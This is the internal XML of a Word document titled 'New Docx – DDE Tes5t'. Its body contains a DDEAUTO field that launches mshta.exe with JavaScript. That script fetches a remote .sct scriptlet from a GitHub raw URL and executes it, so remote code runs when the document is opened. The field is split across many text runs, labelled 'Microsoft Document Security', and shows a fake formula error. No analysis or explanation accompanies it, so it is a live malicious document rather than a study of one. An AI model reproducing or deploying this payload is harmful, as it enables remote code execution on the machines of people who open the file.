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FEE" w:rsidRDefault="00402C68" w:rsidP="00161BD6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="50"/>
          <w:szCs w:val="50"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
          <w:szCs w:val="50"/>
        </w:rPr>
        <w:t xml:space="preserve">New </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
          <w:szCs w:val="50"/>
        </w:rPr>
        <w:t>Docx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
          <w:szCs w:val="50"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="007B3B1A">
        <w:rPr>
          <w:sz w:val="50"/>
          <w:szCs w:val="50"/>
        </w:rPr>
        <w:t>DDE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
          <w:szCs w:val="50"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tes5t</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00161BD6" w:rsidRDefault="00161BD6" w:rsidP="00161BD6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="50"/>
          <w:szCs w:val="50"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00161BD6" w:rsidRDefault="00161BD6" w:rsidP="00161BD6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="50"/>
          <w:szCs w:val="50"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00161BD6" w:rsidRPr="004D39B9" w:rsidRDefault="00BD5FEB" w:rsidP="007C2D4C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D39B9">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00C23DE2">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00633E6F">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00440518" w:rsidRPr="00440518">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText>DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord\\..\\..</w:instrText>
      </w:r>
      <w:r w:rsidR="00756B53">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve">\\..\\..\\windows\\system32\\mshta.exe </w:instrText>
      </w:r>
      <w:r w:rsidR="00756B53" w:rsidRPr="00756B53">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText>javascript:a=GetObject('script:</w:instrText>
      </w:r>
      <w:r w:rsidR="007C2D4C" w:rsidRPr="007C2D4C">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText>https://raw.githubuser</w:instrText>
      </w:r>
      <w:r w:rsidR="00720ACE">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText>c</w:instrText>
      </w:r>
      <w:r w:rsidR="005B2E2A">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText>ontent.com/edu999/k99/master/drl</w:instrText>
      </w:r>
      <w:r w:rsidR="007C2D4C" w:rsidRPr="007C2D4C">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText>.sct</w:instrText>
      </w:r>
      <w:r w:rsidR="007C2D4C">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText>'</w:instrText>
      </w:r>
      <w:r w:rsidR="00756B53" w:rsidRPr="00756B53">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText>).Exec()</w:instrText>
      </w:r>
      <w:r w:rsidR="00C11B74">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText>;</w:instrText>
      </w:r>
      <w:r w:rsidR="00440518" w:rsidRPr="00440518">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve">   #  " "</w:instrText>
      </w:r>
      <w:r w:rsidR="001679C6" w:rsidRPr="001679C6">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText>Microsoft Document Securit</w:instrText>
      </w:r>
      <w:r w:rsidR="00626F47">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText>y</w:instrText>
      </w:r>
      <w:r w:rsidR="00440518" w:rsidRPr="00440518">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00591EED">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="0030072F" w:rsidRPr="0030072F">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidRPr="004D39B9">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="004D39B9">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>!Unexpected End of Formula</w:t>
      </w:r>
      <w:r w:rsidRPr="004D39B9">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00161BD6" w:rsidRPr="004D39B9">
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1134" w:right="1134" w:bottom="1134" w:left="1134" w:header="0" w:footer="0" w:gutter="0"/>
      <w:cols w:space="720"/>
      <w:formProt w:val="0"/>
      <w:docGrid w:linePitch="10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FreeSans">
    <w:altName w:val="Times New Roman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autoHyphenation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5DE8"/>
    <w:rsid w:val="00023245"/>
    <w:rsid w:val="00055DE8"/>
    <w:rsid w:val="00061683"/>
    <w:rsid w:val="00074613"/>
    <w:rsid w:val="00084059"/>
    <w:rsid w:val="000A39F5"/>
    <w:rsid w:val="000A4428"/>
    <w:rsid w:val="000A6E57"/>
    <w:rsid w:val="00131D6F"/>
    <w:rsid w:val="0013246F"/>
    <w:rsid w:val="0013472C"/>
    <w:rsid w:val="00161BD6"/>
    <w:rsid w:val="001679C6"/>
    <w:rsid w:val="00173F7D"/>
    <w:rsid w:val="00194B42"/>
    <w:rsid w:val="00195FCD"/>
    <w:rsid w:val="001A2837"/>
    <w:rsid w:val="001A71FE"/>
    <w:rsid w:val="001A7D73"/>
    <w:rsid w:val="001B6549"/>
    <w:rsid w:val="001B729D"/>
    <w:rsid w:val="001D08BF"/>
    <w:rsid w:val="001D1654"/>
    <w:rsid w:val="001D6B97"/>
    <w:rsid w:val="001E3DFE"/>
    <w:rsid w:val="001F28B5"/>
    <w:rsid w:val="00211085"/>
    <w:rsid w:val="00224E09"/>
    <w:rsid w:val="00240B56"/>
    <w:rsid w:val="002715A6"/>
    <w:rsid w:val="002C7B7C"/>
    <w:rsid w:val="002D30D2"/>
    <w:rsid w:val="0030072F"/>
    <w:rsid w:val="003167A0"/>
    <w:rsid w:val="00332035"/>
    <w:rsid w:val="003354C6"/>
    <w:rsid w:val="00353329"/>
    <w:rsid w:val="00363E28"/>
    <w:rsid w:val="003672A6"/>
    <w:rsid w:val="00376343"/>
    <w:rsid w:val="003B010B"/>
    <w:rsid w:val="003B4ABB"/>
    <w:rsid w:val="00402C68"/>
    <w:rsid w:val="00407F4B"/>
    <w:rsid w:val="004150BA"/>
    <w:rsid w:val="004225BF"/>
    <w:rsid w:val="00431499"/>
    <w:rsid w:val="0043415B"/>
    <w:rsid w:val="00440518"/>
    <w:rsid w:val="004417B0"/>
    <w:rsid w:val="004657C7"/>
    <w:rsid w:val="00474713"/>
    <w:rsid w:val="0047607A"/>
    <w:rsid w:val="00493413"/>
    <w:rsid w:val="004B001E"/>
    <w:rsid w:val="004C2EEC"/>
    <w:rsid w:val="004D39B9"/>
    <w:rsid w:val="004D4973"/>
    <w:rsid w:val="004D6A1F"/>
    <w:rsid w:val="004E3FEB"/>
    <w:rsid w:val="004F7088"/>
    <w:rsid w:val="00504AB8"/>
    <w:rsid w:val="00506B85"/>
    <w:rsid w:val="00526CF3"/>
    <w:rsid w:val="0054102D"/>
    <w:rsid w:val="0055376F"/>
    <w:rsid w:val="00557368"/>
    <w:rsid w:val="00557FE9"/>
    <w:rsid w:val="005637F9"/>
    <w:rsid w:val="005669C1"/>
    <w:rsid w:val="005867E1"/>
    <w:rsid w:val="00591EED"/>
    <w:rsid w:val="005B2E2A"/>
    <w:rsid w:val="005B51C4"/>
    <w:rsid w:val="005B693B"/>
    <w:rsid w:val="005E2452"/>
    <w:rsid w:val="006162DF"/>
    <w:rsid w:val="00626F47"/>
    <w:rsid w:val="00633E6F"/>
    <w:rsid w:val="00640BDB"/>
    <w:rsid w:val="0065668F"/>
    <w:rsid w:val="006566AB"/>
    <w:rsid w:val="00677D37"/>
    <w:rsid w:val="00680480"/>
    <w:rsid w:val="00686547"/>
    <w:rsid w:val="006A0AC7"/>
    <w:rsid w:val="006A5BCD"/>
    <w:rsid w:val="006B1F38"/>
    <w:rsid w:val="006C2039"/>
    <w:rsid w:val="006D3243"/>
    <w:rsid w:val="006E205B"/>
    <w:rsid w:val="006E624D"/>
    <w:rsid w:val="00700110"/>
    <w:rsid w:val="00720ACE"/>
    <w:rsid w:val="00756B53"/>
    <w:rsid w:val="00767C34"/>
    <w:rsid w:val="00771ACE"/>
    <w:rsid w:val="007838E8"/>
    <w:rsid w:val="00793C0D"/>
    <w:rsid w:val="007B3B1A"/>
    <w:rsid w:val="007C2D4C"/>
    <w:rsid w:val="007D3C20"/>
    <w:rsid w:val="008003F2"/>
    <w:rsid w:val="008024EC"/>
    <w:rsid w:val="00803467"/>
    <w:rsid w:val="008052F0"/>
    <w:rsid w:val="008162EB"/>
    <w:rsid w:val="00820348"/>
    <w:rsid w:val="008258CF"/>
    <w:rsid w:val="00840DC0"/>
    <w:rsid w:val="00862CC2"/>
    <w:rsid w:val="00893A60"/>
    <w:rsid w:val="008950C2"/>
    <w:rsid w:val="008D4AF9"/>
    <w:rsid w:val="008E1AD5"/>
    <w:rsid w:val="008E3314"/>
    <w:rsid w:val="00902010"/>
    <w:rsid w:val="00941CAB"/>
    <w:rsid w:val="00953C03"/>
    <w:rsid w:val="00986787"/>
    <w:rsid w:val="009B332C"/>
    <w:rsid w:val="009D2AC9"/>
    <w:rsid w:val="00A12856"/>
    <w:rsid w:val="00A26460"/>
    <w:rsid w:val="00A34DA5"/>
    <w:rsid w:val="00A372EC"/>
    <w:rsid w:val="00A50E92"/>
    <w:rsid w:val="00A567F9"/>
    <w:rsid w:val="00AC2627"/>
    <w:rsid w:val="00B11463"/>
    <w:rsid w:val="00B1756C"/>
    <w:rsid w:val="00B27740"/>
    <w:rsid w:val="00B42D2F"/>
    <w:rsid w:val="00B5569C"/>
    <w:rsid w:val="00B70FAA"/>
    <w:rsid w:val="00BC3278"/>
    <w:rsid w:val="00BD0FFA"/>
    <w:rsid w:val="00BD5FEB"/>
    <w:rsid w:val="00C01BE3"/>
    <w:rsid w:val="00C11B74"/>
    <w:rsid w:val="00C232A0"/>
    <w:rsid w:val="00C23DE2"/>
    <w:rsid w:val="00C30186"/>
    <w:rsid w:val="00C33F7A"/>
    <w:rsid w:val="00C37537"/>
    <w:rsid w:val="00C62347"/>
    <w:rsid w:val="00CC23A7"/>
    <w:rsid w:val="00CD2E6E"/>
    <w:rsid w:val="00CD2FCD"/>
    <w:rsid w:val="00D0396F"/>
    <w:rsid w:val="00D04535"/>
    <w:rsid w:val="00D1542C"/>
    <w:rsid w:val="00D16117"/>
    <w:rsid w:val="00D21C4C"/>
    <w:rsid w:val="00D6567E"/>
    <w:rsid w:val="00DB0ABC"/>
    <w:rsid w:val="00DB0B7E"/>
    <w:rsid w:val="00DC229D"/>
    <w:rsid w:val="00DC5FF4"/>
    <w:rsid w:val="00DD46B1"/>
    <w:rsid w:val="00DF36B3"/>
    <w:rsid w:val="00DF5B0E"/>
    <w:rsid w:val="00E0607A"/>
    <w:rsid w:val="00E662A9"/>
    <w:rsid w:val="00E809EF"/>
    <w:rsid w:val="00EA18B0"/>
    <w:rsid w:val="00EA275F"/>
    <w:rsid w:val="00EB2E2D"/>
    <w:rsid w:val="00F30FEE"/>
    <w:rsid w:val="00F40F9D"/>
    <w:rsid w:val="00F530D0"/>
    <w:rsid w:val="00F61C63"/>
    <w:rsid w:val="00F84524"/>
    <w:rsid w:val="00FA17D9"/>
    <w:rsid w:val="00FC67D3"/>
    <w:rsid w:val="00FC6992"/>
    <w:rsid w:val="00FE11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Liberation Serif" w:eastAsia="DejaVu Sans" w:hAnsi="Liberation Serif" w:cs="FreeSans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kern w:val="2"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang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qFormat/>
    <w:pPr>
      <w:suppressLineNumbers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Liberation Serif" w:eastAsia="DejaVu Sans" w:hAnsi="Liberation Serif" w:cs="FreeSans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kern w:val="2"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang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qFormat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dde</Template>
  <TotalTime>2</TotalTime>
  <Pages>1</Pages>
  <Words>43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Aniki</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-08-29T14:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-08-29T14:05:00Z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